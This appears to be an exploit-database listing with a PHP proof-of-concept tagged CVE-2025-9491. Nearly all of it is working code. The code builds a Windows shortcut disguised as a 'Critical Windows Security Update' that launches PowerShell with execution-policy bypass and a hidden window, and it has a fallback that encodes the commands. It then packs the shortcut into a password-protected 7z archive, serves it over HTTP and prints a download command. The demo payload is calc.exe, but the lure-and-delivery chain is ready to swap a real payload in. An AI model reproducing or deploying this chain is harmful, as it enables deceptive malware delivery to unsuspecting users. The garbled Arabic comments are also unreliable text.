Share
## https://sploitus.com/exploit?id=PACKETSTORM:217020
=============================================================================================================================================
    | # Title     : Windows LNK File UI Misrepresentation Vulnerability Leading to Remote Code Execution                                        |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : System builtโ€‘in component. No standalone download available                                                                 |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/212542/ & CVE-2025-9491
    
    [+] Summary    : This PHP script is a Proof-of-Concept (PoC) tool that demonstrates how to:
    
    Create a Windows LNK (shortcut) file that executes a PowerShell command (in this example, launches calc.exe).
    
    Package the LNK file into a 7-Zip archive, optionally with a password.
    
    Host the archive on a simple HTTP server using PHPโ€™s built-in server.
    
    Provide a PowerShell command that can download the archive from the HTTP server.
    
    It is meant for educational and defensive testing, not exploitation. It does not contain a real vulnerability โ€” it simply shows the technique of using LNK + PowerShell delivery.
    
    [+] Key technical points:
    
    Uses Windows COM to create the LNK file.
    
    Falls back to PowerShell if COM fails.
    
    Optionally compresses with 7-Zip.
    
    Starts HTTP server to serve the payload.
    
    Designed to be run from the CLI on Windows.
    
    POC : php poc.php
    
    <?php
    
    class WindowsLNKExploit {
        
        private $scriptDir;
        private $localIP;
        
        public function __construct() {
            $this->scriptDir = $this->getScriptDirectory();
            $this->localIP = $this->getLocalIP();
        }
        
        private function getScriptDirectory() {
            return dirname(__FILE__);
        }
        
        private function getLocalIP() {
            $ip = gethostbyname(gethostname());
            
            // ู…ุญุงูˆู„ุฉ ุงู„ุญุตูˆู„ ุนู„ู‰ IP ุญู‚ูŠู‚ูŠ
            $sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
            socket_connect($sock, "8.8.8.8", 53);
            socket_getsockname($sock, $ip);
            socket_close($sock);
            
            return $ip;
        }
        
        public function createMaliciousLNK() {
            $lnkPath = $this->scriptDir . '\\Critical_Update.lnk';
            
            echo "[*] Creating malicious LNK file...\n";
            
            try {
                // ููŠ PHP ุนู„ู‰ WindowsุŒ ูŠู…ูƒู† ุงุณุชุฎุฏุงู… COM
                $shell = new COM('WScript.Shell');
                $shortcut = $shell->CreateShortcut($lnkPath);
                
                $shortcut->TargetPath = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe';
                $shortcut->Arguments = '-NoProfile -ExecutionPolicy Bypass -Command "Start-Process calc.exe; echo Windows Update Completed"';
                $shortcut->WorkingDirectory = 'C:\\Windows\\System32';
                $shortcut->Description = 'Critical Windows Security Update - KB5029244';
                
                // ู…ุญุงูˆู„ุฉ ุชุนูŠูŠู† ุฃูŠู‚ูˆู†ุฉ
                $iconPaths = [
                    'C:\\Windows\\System32\\shell32.dll',
                    'C:\\Windows\\System32\\imageres.dll',
                ];
                
                foreach ($iconPaths as $iconPath) {
                    if (file_exists($iconPath)) {
                        $shortcut->IconLocation = $iconPath . ',78';
                        break;
                    }
                }
                
                $shortcut->WindowStyle = 7; // SW_SHOWMINNOACTIVE
                $shortcut->Save();
                
                if (file_exists($lnkPath)) {
                    echo "[+] LNK created: $lnkPath\n";
                    return $lnkPath;
                } else {
                    return null;
                }
                
            } catch (Exception $e) {
                echo "[-] Error: " . $e->getMessage() . "\n";
                
                // ุทุฑูŠู‚ุฉ ุจุฏูŠู„ุฉ ุจุงุณุชุฎุฏุงู… PowerShell
                return $this->createLNKWithPowerShell();
            }
        }
        
        private function createLNKWithPowerShell() {
            $lnkPath = $this->scriptDir . '\\Critical_Update.lnk';
            
            $psScript = "
            \$WshShell = New-Object -ComObject WScript.Shell
            \$Shortcut = \$WshShell.CreateShortcut('$lnkPath')
            \$Shortcut.TargetPath = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
            \$Shortcut.Arguments = '-NoProfile -ExecutionPolicy Bypass -Command \"Start-Process calc.exe; echo Windows Update Completed\"'
            \$Shortcut.WorkingDirectory = 'C:\\Windows\\System32'
            \$Shortcut.Description = 'Critical Windows Security Update - KB5029244'
            \$Shortcut.IconLocation = 'C:\\Windows\\System32\\shell32.dll,78'
            \$Shortcut.WindowStyle = 7
            \$Shortcut.Save()
            ";
            
            $psScript = base64_encode(iconv('UTF-8', 'UTF-16LE', $psScript));
            $command = "powershell -ExecutionPolicy Bypass -EncodedCommand $psScript";
            
            exec($command, $output, $returnCode);
            
            if (file_exists($lnkPath)) {
                echo "[+] LNK created via PowerShell: $lnkPath\n";
                return $lnkPath;
            }
            
            return null;
        }
        
        public function compressWith7Zip($lnkPath, $password = null) {
            if (!$lnkPath || !file_exists($lnkPath)) {
                echo "[-] LNK file not found\n";
                return null;
            }
            
            // ุงู„ุจุญุซ ุนู† 7-Zip
            $sevenZipPaths = [
                'C:\\Program Files\\7-Zip\\7z.exe',
                'C:\\Program Files (x86)\\7-Zip\\7z.exe',
                '7z.exe',
            ];
            
            $sevenZip = null;
            foreach ($sevenZipPaths as $path) {
                if (file_exists($path)) {
                    $sevenZip = $path;
                    break;
                }
            }
            
            if (!$sevenZip) {
                // ุงู„ุจุญุซ ููŠ PATH
                exec('where 7z', $output, $returnCode);
                if ($returnCode === 0) {
                    $sevenZip = '7z';
                } else {
                    echo "[-] 7-Zip not found\n";
                    return null;
                }
            }
            
            $archiveName = $this->scriptDir . '\\update.7z';
            
            // ุจู†ุงุก ุงู„ุฃู…ุฑ
            $cmd = escapeshellarg($sevenZip) . " a " . escapeshellarg($archiveName) . " " . escapeshellarg($lnkPath);
            
            if ($password) {
                $cmd .= " -p" . escapeshellarg($password);
            }
            
            $cmd .= " -mx9 -mhe=on -t7z";
            
            echo "[*] Compressing with 7-Zip...\n";
            
            exec($cmd, $output, $returnCode);
            
            if ($returnCode === 0 && file_exists($archiveName)) {
                echo "[+] Archive created: $archiveName\n";
                if ($password) {
                    echo "[+] Password: $password\n";
                }
                return $archiveName;
            } else {
                echo "[-] Compression failed\n";
                return null;
            }
        }
        
        public function startHTTPServer($port = 8080) {
            echo "[+] Starting PHP built-in server on http://{$this->localIP}:$port\n";
            echo "[+] Download URL: http://{$this->localIP}:$port/update.7z\n";
            echo "[+] Server running... Press Ctrl+C to stop\n";
            
            $publicDir = $this->scriptDir;
            
            // ุฅู†ุดุงุก ู…ู„ู router ุจุณูŠุท
            $routerScript = $publicDir . '\\router.php';
            $routerContent = '<?php
    $request = $_SERVER["REQUEST_URI"];
    if ($request === "/" || $request === "/update.7z") {
        $file = __DIR__ . "\\update.7z";
        if (file_exists($file)) {
            header("Content-Type: application/x-7z-compressed");
            header("Content-Disposition: attachment; filename=\\"update.7z\\"");
            header("Content-Length: " . filesize($file));
            readfile($file);
            echo "[+] CVE-2025-9491: Malicious LNK served to " . $_SERVER["REMOTE_ADDR"] . "\\n";
            exit;
        }
    }
    http_response_code(404);
    echo "404 Not Found";
    ?>';
            
            file_put_contents($routerScript, $routerContent);
            
            // ุชุดุบูŠู„ ุงู„ุฎุงุฏู…
            $command = "php -S {$this->localIP}:$port -t " . escapeshellarg($publicDir) . " " . escapeshellarg($routerScript);
            
            echo "Command: $command\n";
            echo "You need to run this command manually in another terminal:\n";
            echo $command . "\n\n";
            
            // ุจุฏู„ุงู‹ ู…ู† ุฐู„ูƒุŒ ูŠู…ูƒู† ุงุณุชุฎุฏุงู… exec() ู…ุน nohup ุนู„ู‰ Unix-like systems
            // ุนู„ู‰ WindowsุŒ ูŠู…ูƒู† ุงุณุชุฎุฏุงู… start
            if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
                $cmdFile = $publicDir . '\\start_server.bat';
                $batchContent = "@echo off\nstart /B $command\n";
                file_put_contents($cmdFile, $batchContent);
                echo "[+] Created batch file: $cmdFile\n";
                echo "[+] Run it in a new terminal window\n";
            }
        }
        
        public function main() {
            echo str_repeat("=", 60) . "\n";
            echo "CVE-2025-9491 LNK Exploit + 7-Zip + HTTP Server (PHP Version)\n";
            echo str_repeat("=", 60) . "\n";
            
            // ุงู„ุชุญู‚ู‚ ู…ู† ู†ุธุงู… ุงู„ุชุดุบูŠู„
            if (strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN') {
                echo "[-] This script requires Windows OS\n";
                return;
            }
            
            // ุฅู†ุดุงุก ู…ู„ู LNK
            $lnkFile = $this->createMaliciousLNK();
            if (!$lnkFile) {
                echo "[-] Failed to create LNK\n";
                return;
            }
            
            // ุถุบุท ู…ุน 7-Zip
            echo "\n[*] Compress with 7-Zip? (y/n): ";
            $compress = trim(strtolower(fgets(STDIN)));
            
            if ($compress === 'y') {
                echo "[*] Password (optional): ";
                $password = trim(fgets(STDIN));
                if (empty($password)) {
                    $password = null;
                }
                
                $archive = $this->compressWith7Zip($lnkFile, $password);
                
                if ($archive) {
                    echo "\n[+] Archive ready: $archive\n";
                    
                    // ุจุฏุก ุฎุงุฏู… HTTP
                    echo "\n[*] Start HTTP server? (y/n): ";
                    $startServer = trim(strtolower(fgets(STDIN)));
                    
                    if ($startServer === 'y') {
                        $this->startHTTPServer();
                    }
                    
                    echo "\n[+] PowerShell download command:\n";
                    echo "    iwr http://{$this->localIP}:8080/update.7z -OutFile update.7z\n";
                    
                    // ุงู„ุงู†ุชุธุงุฑ ู„ู„ุฅุฏุฎุงู„
                    echo "\n[*] Press Enter to exit...";
                    fgets(STDIN);
                    
                } else {
                    echo "[-] Compression failed\n";
                    echo "[*] Use raw LNK: $lnkFile\n";
                }
            } else {
                echo "\n[*] Raw LNK file: $lnkFile\n";
            }
        }
        
        public function generatePowerShellDownloadCommand() {
            return "iwr http://{$this->localIP}:8080/update.7z -OutFile update.7z";
        }
    }
    
    // ุงู„ุชู†ุธูŠู ุงู„ุชู„ู‚ุงุฆูŠ
    register_shutdown_function(function() {
        // ูŠู…ูƒู† ุฅุถุงูุฉ ุชู†ุธูŠู ุงู„ู…ู„ูุงุช ุงู„ู…ุคู‚ุชุฉ ู‡ู†ุง
    });
    
    // ุงู„ุชู†ููŠุฐ
    if (PHP_SAPI === 'cli') {
        $exploit = new WindowsLNKExploit();
        $exploit->main();
    } else {
        echo "This script must be run from command line (CLI)\n";
        echo "Usage: php " . basename(__FILE__) . "\n";
    }
    
    // ูˆุธุงุฆู ู…ุณุงุนุฏุฉ ุฅุถุงููŠุฉ
    class HelperFunctions {
        
        public static function checkRequirements() {
            $checks = [
                'PHP Version' => version_compare(PHP_VERSION, '7.0.0', '>='),
                'Windows OS' => (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN'),
                'COM Support' => extension_loaded('com_dotnet'),
                'Exec Function' => function_exists('exec'),
            ];
            
            return $checks;
        }
        
        public static function showBanner() {
            $banner = "
            โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
            โ•‘   CVE-2025-9491 PoC                                       โ•‘
            โ•‘   Author: indoushka                                       โ•‘
            โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
            ";
            echo $banner . "\n";
        }
    }
    
    // ุจุฏูŠู„ ู„ุงุณุชุฎุฏุงู… threading ููŠ PHP
    class BackgroundProcess {
        
        public static function runInBackground($command) {
            if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
                pclose(popen("start /B " . $command, "r"));
            } else {
                exec($command . " > /dev/null 2>&1 &");
            }
        }
    }
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================